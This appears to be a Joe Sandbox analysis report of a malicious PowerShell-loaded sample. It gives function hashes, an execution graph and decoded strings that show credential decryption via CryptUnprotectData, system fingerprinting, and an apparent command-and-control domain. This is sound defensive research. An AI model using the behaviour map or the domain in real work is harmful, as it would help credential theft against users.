                                                                                      • API String ID: 0-1989542842
                                                                                      • Opcode ID: f2cacbce35e270ad3e86f280f44e410304a2143a7c60f57b3ba8157dfd01a30f
                                                                                      • Instruction ID: 2c19e5060c8d3de1615358bf590eb1b8072c1fd9772ec733024f5a14efdfc326
                                                                                      • Opcode Fuzzy Hash: f2cacbce35e270ad3e86f280f44e410304a2143a7c60f57b3ba8157dfd01a30f
                                                                                      • Instruction Fuzzy Hash: 4B41C1F2B402119BEB248E58E544B6ABBF7AF84750F18C069E4099F291D772DC41CBA2
                                                                                      Function 073DE35D Relevance: 5.1, Strings: 4, Instructions: 108COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'fq$4'fq$84ml$tPfq
                                                                                      • API String ID: 0-1989542842
                                                                                      • Opcode ID: 2841f57a421c7c16436600e930480bb94194a87c37386f638dad3c4a6b07beb7
                                                                                      • Instruction ID: 5edf0e197927368a967ca30ba4fa330bd7092e8dbf795d32c112cef97dd5aacf
                                                                                      • Opcode Fuzzy Hash: 2841f57a421c7c16436600e930480bb94194a87c37386f638dad3c4a6b07beb7
                                                                                      • Instruction Fuzzy Hash: C531E6F2B802119FEB208B68A555B7ABFF7AF85740F18C055D5099F691D732DC01C762
                                                                                      Function 073D0308 Relevance: 5.0, Strings: 4, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'fq$4'fq$$fq$$fq
                                                                                      • API String ID: 0-2206495126
                                                                                      • Opcode ID: 8691c41fb7d889aeed0d7056f68b4b1b02e5b70fbde219531c139972c96e18a9
                                                                                      • Instruction ID: d96a741ab769850a893a9f8ec865aa14990a548ee080870f375d498b8d050789
                                                                                      • Opcode Fuzzy Hash: 8691c41fb7d889aeed0d7056f68b4b1b02e5b70fbde219531c139972c96e18a9
                                                                                      • Instruction Fuzzy Hash: F4012BA271D2818FD72E067D58201567F776FC2A04F29409FC040CB692CF564C068797
                                                                                      Function 08164117 Relevance: 5.0, Strings: 4, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2623383395.0000000008160000.00000040.00000800.00020000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_8160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'fq$4'fq$LRfq$LRfq
                                                                                      • API String ID: 0-1175026112
                                                                                      • Opcode ID: 65bdc0b72feb1014003261c8dca86a4a2e57f9cdd57f6fc06a9003bf8a27c138
                                                                                      • Instruction ID: 2844b9f665d6ea1f86412bf6a180f0592cf559a6d4d6a49e4ab66dfdfbcbb5a1
                                                                                      • Opcode Fuzzy Hash: 65bdc0b72feb1014003261c8dca86a4a2e57f9cdd57f6fc06a9003bf8a27c138
                                                                                      • Instruction Fuzzy Hash: D4F0E9717002088BDB185B7458512BA36567FE0266B11403EC6A18A684DF36A935D77E

                                                                                      Execution Graph

                                                                                      Execution Coverage:7.9%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:22.7%
                                                                                      Total number of Nodes:475
                                                                                      Total number of Limit Nodes:37
                                                                                      execution_graph 14732 408600 14734 40860f 14732->14734 14733 408a48 ExitProcess 14734->14733 14735 408a31 14734->14735 14736 408624 GetCurrentProcessId GetCurrentThreadId 14734->14736 14747 43e080 14735->14747 14737 408650 SHGetSpecialFolderPathW 14736->14737 14738 40864c 14736->14738 14740 408880 14737->14740 14738->14737 14741 408964 GetForegroundWindow 14740->14741 14742 408982 14741->14742 14742->14735 14744 40b7b0 FreeLibrary 14742->14744 14745 40b7cc 14744->14745 14746 40b7d1 FreeLibrary 14745->14746 14746->14735 14750 43f970 14747->14750 14749 43e085 FreeLibrary 14749->14733 14751 43f979 14750->14751 14751->14749 14752 40e687 14753 40e6a0 14752->14753 14758 439280 14753->14758 14755 40e77a 14756 439280 12 API calls 14755->14756 14757 40e908 14756->14757 14757->14757 14759 4392b0 CoCreateInstance 14758->14759 14761 439906 14759->14761 14762 4394e4 SysAllocString 14759->14762 14764 439916 GetVolumeInformationW 14761->14764 14765 439574 14762->14765 14773 439934 14764->14773 14766 4398f5 SysFreeString 14765->14766 14767 43957c CoSetProxyBlanket 14765->14767 14766->14761 14768 4398eb 14767->14768 14769 43959c SysAllocString 14767->14769 14768->14766 14771 4396a0 14769->14771 14771->14771 14772 439701 SysAllocString 14771->14772 14775 439728 14772->14775 14773->14755 14774 4398d6 SysFreeString SysFreeString 14774->14768 14775->14774 14776 4398cc SysFreeString 14775->14776 14777 43976f VariantInit 14775->14777 14776->14774 14778 4397c0 14777->14778 14778->14778 14779 4398bb VariantClear 14778->14779 14779->14776 14472 42d34a 14473 42d370 14472->14473 14473->14473 14474 42d3ea GetPhysicallyInstalledSystemMemory 14473->14474 14475 42d410 14474->14475 14780 43058b 14781 4305b9 SysAllocString 14780->14781 14783 43079d 14781->14783 14784 43eb88 14785 43eba0 14784->14785 14786 43ebde 14785->14786 14791 43e110 LdrInitializeThunk 14785->14791 14786->14786 14787 43ec4e 14786->14787 14790 43e110 LdrInitializeThunk 14786->14790 14790->14787 14791->14786 14476 40ef53 CoInitializeEx CoInitializeEx 14801 409d1e 14802 409d40 14801->14802 14802->14802 14803 409d94 LoadLibraryExW 14802->14803 14804 409da5 14803->14804 14805 409e74 LoadLibraryExW 14804->14805 14806 409e85 14805->14806 14807 43ec9c 14809 43ec9f 14807->14809 14808 43ed6e 14809->14808 14811 43e110 LdrInitializeThunk 14809->14811 14811->14808 14477 43e760 14478 43e780 14477->14478 14478->14478 14479 43e7be 14478->14479 14481 43e110 LdrInitializeThunk 14478->14481 14481->14479 14812 438ea0 14815 438ec5 14812->14815 14814 439210 14816 438fc9 14815->14816 14821 43e110 LdrInitializeThunk 14815->14821 14816->14814 14818 4390e1 14816->14818 14820 43e110 LdrInitializeThunk 14816->14820 14818->14814 14822 43e110 LdrInitializeThunk 14818->14822 14820->14816 14821->14815 14822->14818 14823 43c5a0 14824 43c5d0 14823->14824 14827 43c62e 14824->14827 14831 43e110 LdrInitializeThunk 14824->14831 14825 43c801 14827->14825 14830 43c749 14827->14830 14832 43e110 LdrInitializeThunk 14827->14832 14828 43c570 RtlFreeHeap 14828->14825 14830->14828 14831->14827 14832->14830 14833 43e0a0 14834 43e0f3 14833->14834 14835 43e0c0 14833->14835 14836 43e0d4 14833->14836 14837 43e0e8 14833->14837 14838 43c570 RtlFreeHeap 14834->14838 14835->14834 14835->14836 14839 43e0d9 RtlReAllocateHeap 14836->14839 14838->14837 14839->14837 14482 43e967 14483 43e980 14482->14483 14486 43e110 LdrInitializeThunk 14483->14486 14485 43e9ef 14486->14485 14840 411227 14841 411241 14840->14841 14842 4114e5 RtlExpandEnvironmentStrings 14841->14842 14846 40f444 14841->14846 14847 411562 14842->14847 14843 408b60 ExitProcess 14844 411c4e 14843->14844 14848 4157c0 14844->14848 14847->14843 14847->14846 14849 4157e0 14848->14849 14849->14849 14850 441320 LdrInitializeThunk 14849->14850 14851 4158ed 14850->14851 14852 415cad 14851->14852 14853 41590f 14851->14853 14854 441650 LdrInitializeThunk 14851->14854 14857 415ae8 14851->14857 14860 415b92 14851->14860 14862 41594e 14851->14862 14858 441650 LdrInitializeThunk 14852->14858 14852->14862 14864 415cf7 14852->14864 14853->14852 14855 441720 LdrInitializeThunk 14853->14855 14853->14857 14853->14860 14853->14862 14854->14853 14856 41593f 14855->14856 14856->14852 14856->14857 14856->14860 14856->14862 14857->14862 14929 43e110 LdrInitializeThunk 14857->14929 14858->14864 14865 441320 LdrInitializeThunk 14860->14865 14861 441720 LdrInitializeThunk 14861->14864 14862->14846 14863 4160df 14863->14846 14876 416319 14863->14876 14882 41634d 14863->14882 14885 41c8a0 14863->14885 14864->14861 14864->14863 14871 4160b5 CryptUnprotectData 14864->14871 14884 43e110 LdrInitializeThunk 14864->14884 14865->14852 14870 416f0e 14871->14863 14871->14864 14872 4165bd 14873 41c8a0 3 API calls 14872->14873 14873->14862 14875 4166be 14881 416792 14875->14881 14930 43e110 LdrInitializeThunk 14875->14930 14897 419ad0 14876->14897 14878 41731b 14880 4168eb 14880->14870 14932 43e110 LdrInitializeThunk 14880->14932 14881->14880 14931 43e110 LdrInitializeThunk 14881->14931 14882->14862 14882->14872 14883 4414b0 LdrInitializeThunk 14882->14883 14883->14882 14884->14864 14886 41c8ca 14885->14886 14933 414ca0 14886->14933 14888 41c9cb 14889 414ca0 3 API calls 14888->14889 14890 41ca59 14889->14890 14891 414ca0 3 API calls 14890->14891 14892 41cadf 14891->14892 14893 414ca0 3 API calls 14892->14893 14894 41cbf9 14893->14894 14895 414ca0 3 API calls 14894->14895 14896 41cc62 14895->14896 14896->14876 14898 419b00 14897->14898 14903 419b78 14898->14903 15014 43e110 LdrInitializeThunk 14898->15014 14899 416338 14899->14875 14899->14882 14901 419cbe 14901->14899 14906 419d6e 14901->14906 15016 43e110 LdrInitializeThunk 14901->15016 14903->14901 15015 43e110 LdrInitializeThunk 14903->15015 14905 419eef 14907 43c570 RtlFreeHeap 14905->14907 14906->14905 14914 419f48 14906->14914 15017 43e110 LdrInitializeThunk 14906->15017 14907->14914 14909 41a2a7 FreeLibrary 14913 41a157 14909->14913 14911 41a152 14911->14909 14912 41a216 FreeLibrary 14911->14912 14916 41a230 14912->14916 14913->14899 15019 43e110 LdrInitializeThunk 14913->15019 14914->14899 14914->14909 14914->14911 14914->14913 15018 43e110 LdrInitializeThunk 14914->15018 14918 41a2a2 14916->14918 15020 43e110 LdrInitializeThunk 14916->15020 14921 41a3fe 14918->14921 15021 43e110 LdrInitializeThunk 14918->15021 14920 41ac58 14922 43c570 RtlFreeHeap 14920->14922 14921->14899 14927 41a4de 14921->14927 15022 43e110 LdrInitializeThunk 14921->15022 14922->14899 14924 43c830 LdrInitializeThunk 14924->14927 14925 43c990 LdrInitializeThunk 14925->14927 14926 43c570 RtlFreeHeap 14926->14927 14927->14920 14927->14924 14927->14925 14927->14926 14928 43e110 LdrInitializeThunk 14927->14928 14928->14927 14929->14875 14930->14881 14931->14880 14932->14878 14934 414cc0 14933->14934 14935 441320 LdrInitializeThunk 14934->14935 14936 414e14 14935->14936 14937 441320 LdrInitializeThunk 14936->14937 14966 415021 14937->14966 14938 41509e 14939 4150e9 14938->14939 14940 41522e 14938->14940 14972 415170 14938->14972 14942 43c570 RtlFreeHeap 14939->14942 14940->14888 14945 4150ef 14942->14945 14943 415551 14992 43e110 LdrInitializeThunk 14943->14992 14946 415152 14945->14946 15001 43e110 LdrInitializeThunk 14945->15001 14947 4156a1 14946->14947 14948 4155d3 14946->14948 14949 4156d2 14946->14949 14950 415625 14946->14950 14951 41579e 14946->14951 14952 4157b0 14946->14952 14953 43c5a0 2 API calls 14946->14953 14965 41563c 14946->14965 14970 4155ff 14946->14970 14971 415696 14946->14971 14947->14949 14959 441650 LdrInitializeThunk 14947->14959 14947->14965 14947->14970 14947->14971 14948->14947 14948->14949 14948->14950 14948->14951 14948->14952 14948->14965 14948->14970 14948->14971 14993 43ca40 14948->14993 14960 441650 LdrInitializeThunk 14949->14960 14957 441320 LdrInitializeThunk 14950->14957 14954 43c990 LdrInitializeThunk 14951->14954 14955 43c990 LdrInitializeThunk 14952->14955 14961 4155c7 14953->14961 14954->14952 14962 4157b9 14955->14962 14957->14965 14958 441720 LdrInitializeThunk 14958->14965 14959->14949 14960->14965 14968 43c830 LdrInitializeThunk 14961->14968 14962->14962 14965->14958 14965->14970 14965->14971 14966->14938 14966->14939 14966->14972 14974 43e110 LdrInitializeThunk 14966->14974 14967 43e110 LdrInitializeThunk 14967->14972 14968->14948 14970->14888 14971->14970 15002 43e110 LdrInitializeThunk 14971->15002 14972->14940 14972->14943 14972->14967 14975 439d30 14972->14975 14974->14938 14977 439d40 14975->14977 14978 439e53 14977->14978 15003 43e0a0 14977->15003 15010 43e110 LdrInitializeThunk 14977->15010 14982 43c830 LdrInitializeThunk 14978->14982 14985 43a25b 14978->14985 14980 43c570 RtlFreeHeap 14981 43a274 14980->14981 14981->14972 14988 439e9a 14982->14988 14983 43a25f 14984 43c990 LdrInitializeThunk 14983->14984 14984->14985 14985->14980 14986 43e0a0 2 API calls 14986->14988 14987 43c570 RtlFreeHeap 14987->14988 14988->14983 14988->14986 14988->14987 14989 43a281 14988->14989 14991 43e110 LdrInitializeThunk 14988->14991 14990 43c570 RtlFreeHeap 14989->14990 14990->14983 14991->14988 14992->14945 14994 4155f1 14993->14994 14995 43ca5a 14993->14995 14994->14947 14994->14949 14994->14950 14994->14951 14994->14952 14994->14965 14994->14970 14994->14971 14995->14994 14998 43cae2 14995->14998 15011 43e110 LdrInitializeThunk 14995->15011 14997 43cc4e 14997->14994 14997->14997 15013 43e110 LdrInitializeThunk 14997->15013 14998->14997 15012 43e110 LdrInitializeThunk 14998->15012 15001->14946 15002->14951 15004 43e0f3 15003->15004 15005 43e0c0 15003->15005 15006 43e0d4 15003->15006 15007 43e0e8 15003->15007 15008 43c570 RtlFreeHeap 15004->15008 15005->15004 15005->15006 15009 43e0d9 RtlReAllocateHeap 15006->15009 15007->14977 15008->15007 15009->15007 15010->14977 15011->14998 15012->14997 15013->14994 15014->14903 15015->14901 15016->14906 15017->14905 15018->14911 15019->14899 15020->14918 15021->14921 15022->14927 14487 437764 14488 43777c 14487->14488 14489 43779d GetUserDefaultUILanguage 14488->14489 14490 4377c7 14489->14490 15023 430b2b CoSetProxyBlanket 14492 42c9eb 14495 42c8e2 14492->14495 14493 42cab5 14495->14493 14496 43e110 LdrInitializeThunk 14495->14496 14496->14495 15024 43ea29 15025 43ea50 15024->15025 15025->15025 15026 43ea8e 15025->15026 15031 43e110 LdrInitializeThunk 15025->15031 15030 43e110 LdrInitializeThunk 15026->15030 15029 43eb59 15030->15029 15031->15026 15032 43e3a9 15033 43e3b2 GetForegroundWindow 15032->15033 15034 43e3c9 15033->15034 14497 4218f0 14498 4218fe 14497->14498 14501 421950 14497->14501 14503 421a10 14498->14503 14504 421a20 14503->14504 14504->14504 14507 4414b0 14504->14507 14506 421b0f 14508 4414d0 14507->14508 14509 4415fe 14508->14509 14511 43e110 LdrInitializeThunk 14508->14511 14509->14506 14511->14509 14512 40ec77 CoInitializeSecurity CoInitializeSecurity 14513 42f67b SysFreeString 14514 42f893 14513->14514 14515 40cc7a 14568 408b60 14515->14568 14517 40cc86 14518 408b60 ExitProcess 14517->14518 14519 40cca2 14518->14519 14573 4242d0 14519->14573 14521 40cca8 14522 408b60 ExitProcess 14521->14522 14523 40ccbe 14522->14523 14584 424560 14523->14584 14525 40ccc4 14526 408b60 ExitProcess 14525->14526 14527 40ccd7 14526->14527 14595 427440 14527->14595 14531 40ccef 14613 429e80 14531->14613 14533 40ccf8 14534 408b60 ExitProcess 14533->14534 14535 40cd0e 14534->14535 14617 4290d0 14535->14617 14537 40cd14 14538 408b60 ExitProcess 14537->14538 14539 40cd2a 14538->14539 14540 433e30 6 API calls 14539->14540 14541 40cd39 14540->14541 14542 408b60 ExitProcess 14541->14542 14543 40cd4c 14542->14543 14544 408b60 ExitProcess 14543->14544 14545 40cd68 14544->14545 14546 4242d0 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlFreeHeap LdrInitializeThunk 14545->14546 14547 40cd6e 14546->14547 14548 408b60 ExitProcess 14547->14548 14549 40cd84 14548->14549 14550 424560 RtlExpandEnvironmentStrings RtlFreeHeap LdrInitializeThunk 14549->14550 14551 40cd8a 14550->14551 14552 408b60 ExitProcess 14551->14552 14553 40cd9d 14552->14553 14554 427440 RtlFreeHeap LdrInitializeThunk 14553->14554 14555 40cdac 14554->14555 14556 427740 RtlFreeHeap LdrInitializeThunk 14555->14556 14557 40cdb5 14556->14557 14558 429e80 RtlExpandEnvironmentStrings 14557->14558 14559 40cdbe 14558->14559 14560 408b60 ExitProcess 14559->14560 14561 40cdd4 14560->14561 14562 4290d0 RtlExpandEnvironmentStrings 14561->14562 14563 40cdda 14562->14563 14564 408b60 ExitProcess 14563->14564 14565 40cdf0 14564->14565 14566 433e30 6 API calls 14565->14566 14567 40cdff 14566->14567 14621 408530 14568->14621 14570 408530 ExitProcess 14571 408b9d 14570->14571 14571->14570 14572 408bec 14571->14572 14572->14517 14574 424360 14573->14574 14574->14574 14575 424376 RtlExpandEnvironmentStrings 14574->14575 14577 4243d0 14575->14577 14578 4246e1 14577->14578 14579 424431 RtlExpandEnvironmentStrings 14577->14579 14583 424450 14577->14583 14625 4406f0 14577->14625 14633 440460 14578->14633 14579->14577 14579->14578 14579->14583 14583->14521 14585 42456e 14584->14585 14586 440340 LdrInitializeThunk 14585->14586 14590 424408 14586->14590 14587 4406f0 2 API calls 14587->14590 14588 4246e1 14591 440460 2 API calls 14588->14591 14589 424450 14589->14525 14589->14589 14590->14587 14590->14588 14590->14589 14592 424431 RtlExpandEnvironmentStrings 14590->14592 14593 424712 14591->14593 14592->14588 14592->14589 14592->14590 14593->14589 14594 440340 LdrInitializeThunk 14593->14594 14594->14589 14596 427460 14595->14596 14599 4274ae 14596->14599 14654 43e110 LdrInitializeThunk 14596->14654 14597 40cce6 14603 427740 14597->14603 14599->14597 14602 42756e 14599->14602 14655 43e110 LdrInitializeThunk 14599->14655 14600 43c570 RtlFreeHeap 14600->14597 14602->14600 14656 427760 14603->14656 14605 427754 14605->14531 14608 428080 14608->14531 14612 42804c 14612->14608 14673 441320 14612->14673 14677 441650 14612->14677 14681 441720 14612->14681 14614 429f10 14613->14614 14614->14614 14615 429f37 RtlExpandEnvironmentStrings 14614->14615 14616 429dd1 14615->14616 14616->14533 14618 429110 14617->14618 14618->14618 14619 429136 RtlExpandEnvironmentStrings 14618->14619 14620 429180 14619->14620 14620->14620 14622 408595 14621->14622 14623 408542 14621->14623 14622->14623 14624 40859c ExitProcess 14622->14624 14623->14571 14624->14623 14626 440710 14625->14626 14626->14626 14629 44075e 14626->14629 14645 43e110 LdrInitializeThunk 14626->14645 14627 4409d3 14627->14577 14629->14627 14632 44084e 14629->14632 14646 43e110 LdrInitializeThunk 14629->14646 14632->14632 14647 43c570 14632->14647 14634 440480 14633->14634 14637 4404ce 14634->14637 14651 43e110 LdrInitializeThunk 14634->14651 14635 424712 14635->14583 14641 440340 14635->14641 14637->14635 14640 4405af 14637->14640 14652 43e110 LdrInitializeThunk 14637->14652 14638 43c570 RtlFreeHeap 14638->14635 14640->14638 14640->14640 14642 440360 14641->14642 14644 44042f 14642->14644 14653 43e110 LdrInitializeThunk 14642->14653 14644->14583 14645->14629 14646->14632 14648 43c583 14647->14648 14649 43c585 14647->14649 14648->14627 14650 43c58a RtlFreeHeap 14649->14650 14650->14627 14651->14637 14652->14640 14653->14644 14654->14599 14655->14602 14657 4277a0 14656->14657 14657->14657 14687 43c5a0 14657->14687 14661 427823 14662 42782f 14661->14662 14699 43cdf0 14661->14699 14707 43c990 14662->14707 14666 43a2a0 14671 43a2d0 14666->14671 14667 440340 LdrInitializeThunk 14667->14671 14668 4406f0 2 API calls 14668->14671 14669 43a428 14669->14612 14671->14667 14671->14668 14671->14669 14717 440d20 14671->14717 14725 43e110 LdrInitializeThunk 14671->14725 14674 441340 14673->14674 14675 44145e 14674->14675 14728 43e110 LdrInitializeThunk 14674->14728 14675->14612 14678 441680 14677->14678 14679 4416ce 14678->14679 14729 43e110 LdrInitializeThunk 14678->14729 14679->14612 14683 441750 14681->14683 14682 44184e 14682->14612 14685 4417a9 14683->14685 14730 43e110 LdrInitializeThunk 14683->14730 14685->14682 14731 43e110 LdrInitializeThunk 14685->14731 14688 43c5d0 14687->14688 14691 43c62e 14688->14691 14711 43e110 LdrInitializeThunk 14688->14711 14689 427817 14695 43c830 14689->14695 14691->14689 14694 43c749 14691->14694 14712 43e110 LdrInitializeThunk 14691->14712 14692 43c570 RtlFreeHeap 14692->14689 14694->14692 14696 43c841 14695->14696 14697 43c8fe 14695->14697 14696->14697 14713 43e110 LdrInitializeThunk 14696->14713 14697->14661 14700 43ce40 14699->14700 14706 43ce9e 14700->14706 14714 43e110 LdrInitializeThunk 14700->14714 14702 43d60e 14702->14661 14703 43d59a 14703->14702 14715 43e110 LdrInitializeThunk 14703->14715 14705 43e110 LdrInitializeThunk 14705->14706 14706->14702 14706->14703 14706->14705 14706->14706 14708 43c99a 14707->14708 14710 427749 14707->14710 14708->14710 14716 43e110 LdrInitializeThunk 14708->14716 14710->14605 14710->14666 14711->14691 14712->14694 14713->14697 14714->14706 14715->14702 14716->14710 14718 440d2f 14717->14718 14721 440e98 14718->14721 14726 43e110 LdrInitializeThunk 14718->14726 14719 44114b 14719->14671 14721->14719 14724 44108e 14721->14724 14727 43e110 LdrInitializeThunk 14721->14727 14722 43c570 RtlFreeHeap 14722->14719 14724->14722 14725->14671 14726->14721 14727->14724 14728->14675 14729->14679 14730->14685 14731->14682 15035 4239b9 15036 423406 15035->15036 15041 42374a 15035->15041 15037 423b50 RtlExpandEnvironmentStrings 15039 423c50 15037->15039 15039->15036 15039->15039 15040 423c9e RtlExpandEnvironmentStrings 15039->15040 15043 423f58 15039->15043 15045 423ce2 15039->15045 15048 423def 15039->15048 15040->15036 15040->15043 15040->15045 15040->15048 15041->15035 15041->15036 15041->15037 15041->15039 15041->15045 15063 43e110 LdrInitializeThunk 15041->15063 15043->15036 15050 421d00 15043->15050 15045->15045 15046 4414b0 LdrInitializeThunk 15045->15046 15046->15048 15047 423f41 GetLogicalDrives 15049 4414b0 LdrInitializeThunk 15047->15049 15048->15036 15048->15043 15048->15047 15048->15048 15049->15043 15051 441320 LdrInitializeThunk 15050->15051 15054 421d43 15051->15054 15053 43c570 RtlFreeHeap 15056 42239e 15053->15056 15055 4223f5 15054->15055 15062 421de9 15054->15062 15064 43e110 LdrInitializeThunk 15054->15064 15055->15036 15056->15055 15066 43e110 LdrInitializeThunk 15056->15066 15058 42245a 15059 422383 15059->15053 15059->15058 15061 43c570 RtlFreeHeap 15061->15062 15062->15059 15062->15061 15065 43e110 LdrInitializeThunk 15062->15065 15063->15041 15064->15054 15065->15062 15066->15056

                                                                                      Executed Functions

                                                                                      Function 00422E6D Relevance: 50.5, APIs: 3, Strings: 25, Instructions: 1504COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "7B$%"$+A#C=]=_$- $f$8]pY$9#'$=]=_$CNF8$Fm$I$JOSP$Q*RG$R03!$V]$].n^$_^]\$_^]\$advicebedsu.click$eN$g}zh$p7B$s$wdnf$~SS}$rp
                                                                                      • API String ID: 0-652782758
                                                                                      • Opcode ID: 312b7b5beb43cb0b759412417bc2b12ba6029b012928b32f68d72bd562445efa
                                                                                      • Instruction ID: c461727374bb2b2ad86d2c2bcda0cf258ef6ef710b96b519a2ac6f34890c1cf1
                                                                                      • Opcode Fuzzy Hash: 312b7b5beb43cb0b759412417bc2b12ba6029b012928b32f68d72bd562445efa
                                                                                      • Instruction Fuzzy Hash: 4CB241B5A08311CFD714CF29D8816ABBBF2FF86310F19856DE4859B391D7389902CB96
                                                                                      Function 00439280 Relevance: 35.7, APIs: 12, Strings: 8, Instructions: 653memorycomCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 204 439280-4392a4 205 4392b0-4392d7 204->205 205->205 206 4392d9-4392ef 205->206 207 4392f0-439322 206->207 207->207 208 439324-43936a 207->208 209 439370-43938c 208->209 209->209 210 43938e-4393a7 209->210 212 43942a-439435 210->212 213 4393ad-4393b6 210->213 215 439440-43947b 212->215 214 4393c0-4393d9 213->214 214->214 216 4393db-4393ee 214->216 215->215 217 43947d-4394de CoCreateInstance 215->217 218 4393f0-43941e 216->218 219 439906-439932 call 43fe00 GetVolumeInformationW 217->219 220 4394e4-439515 217->220 218->218 221 439420-439425 218->221 226 439934-439938 219->226 227 43993c-43993e 219->227 222 439520-43954d 220->222 221->212 222->222 224 43954f-439576 SysAllocString 222->224 232 4398f5-439902 SysFreeString 224->232 233 43957c-439596 CoSetProxyBlanket 224->233 226->227 228 439950-439957 227->228 230 439970-43998f 228->230 231 439959-439960 228->231 235 439990-4399b2 230->235 231->230 234 439962-43996e 231->234 232->219 236 4398eb-4398f1 233->236 237 43959c-4395b4 233->237 234->230 235->235 238 4399b4-4399ca 235->238 236->232 239 4395c0-43961e 237->239 241 4399d0-439a06 238->241 239->239 240 439620-43969f SysAllocString 239->240 242 4396a0-4396ff 240->242 241->241 243 439a08-439a2e call 41e960 241->243 242->242 244 439701-43972d SysAllocString 242->244 248 439a30-439a37 243->248 249 439733-439755 244->249 250 4398d6-4398e7 SysFreeString * 2 244->250 248->248 251 439a39-439a4c 248->251 258 43975b-43975e 249->258 259 4398cc-4398d3 SysFreeString 249->259 250->236 252 439a52-439a65 call 407fd0 251->252 253 439940-43994a 251->253 252->253 253->228 255 439a6a-439a71 253->255 258->259 260 439764-439769 258->260 259->250 260->259 261 43976f-4397b7 VariantInit 260->261 262 4397c0-4397d4 261->262 262->262 263 4397d6-4397e6 262->263 265 4398bb-4398c8 VariantClear 263->265 266 4397ec-4397f2 263->266 265->259 266->265 267 4397f8-439806 266->267 268 439808-43980d 267->268 269 43983d 267->269 270 43981c-439820 268->270 271 43983f-439877 call 407f50 call 408e10 269->271 272 439822-43982b 270->272 273 439810 270->273 282 4398a7-4398b7 call 407f60 271->282 283 439879-43988f 271->283 276 439832-439836 272->276 277 43982d-439830 272->277 275 439811-43981a 273->275 275->270 275->271 276->275 279 439838-43983b 276->279 277->275 279->275 282->265 283->282 284 439891-43989e 283->284 284->282 286 4398a0-4398a3 284->286 286->282
                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(0044368C,00000000,00000001,0044367C,00000000), ref: 004394CF
                                                                                      • SysAllocString.OLEAUT32(00001F7A), ref: 00439550
                                                                                      • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043958E
                                                                                      • SysAllocString.OLEAUT32(8DFD93FD), ref: 00439625
                                                                                      • SysAllocString.OLEAUT32(4A105420), ref: 00439706
                                                                                      • VariantInit.OLEAUT32(?), ref: 00439774
                                                                                      • VariantClear.OLEAUT32(?), ref: 004398BC
                                                                                      • SysFreeString.OLEAUT32(?), ref: 004398D3
                                                                                      • SysFreeString.OLEAUT32 ref: 004398DF
                                                                                      • SysFreeString.OLEAUT32(?), ref: 004398E5
                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 004398F6
                                                                                      • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00001F7A,00000000,00000000,00000000,00000000), ref: 0043992E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$Free$Alloc$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                      • String ID: :;$%$=hn$Jtuj$O^$SB$b{tu$gd$t"j
                                                                                      • API String ID: 1341229144-1335595022
                                                                                      • Opcode ID: 00a35f702db370e6906b6da43e33e50153965612b3eb10163526a0eaa7d9f5d2
                                                                                      • Instruction ID: 271c0a760e3fad5fe6ae1bc15f56e5fac369995b8e5486316f76b27bd5228644
                                                                                      • Opcode Fuzzy Hash: 00a35f702db370e6906b6da43e33e50153965612b3eb10163526a0eaa7d9f5d2
                                                                                      • Instruction Fuzzy Hash: F5223476A183019BD314CF28C880B5BBBE2EFC9314F18892DF99497391D779D945CB86
                                                                                      Function 004157C0 Relevance: 31.5, APIs: 1, Strings: 16, Instructions: 1713COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: *,-"$3F&D$_^]\$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$S\]$WQ$`A$L4$L4
                                                                                      • API String ID: 0-2687763561
                                                                                      • Opcode ID: 09428639afa91602ae49414ee6577e4f298c4b2ca618dd5c82e79861ecdb2e7a
                                                                                      • Instruction ID: 9f5ea6b08c49057db174a630c2ad9a5754b08da33700a0e563b445691e8359cf
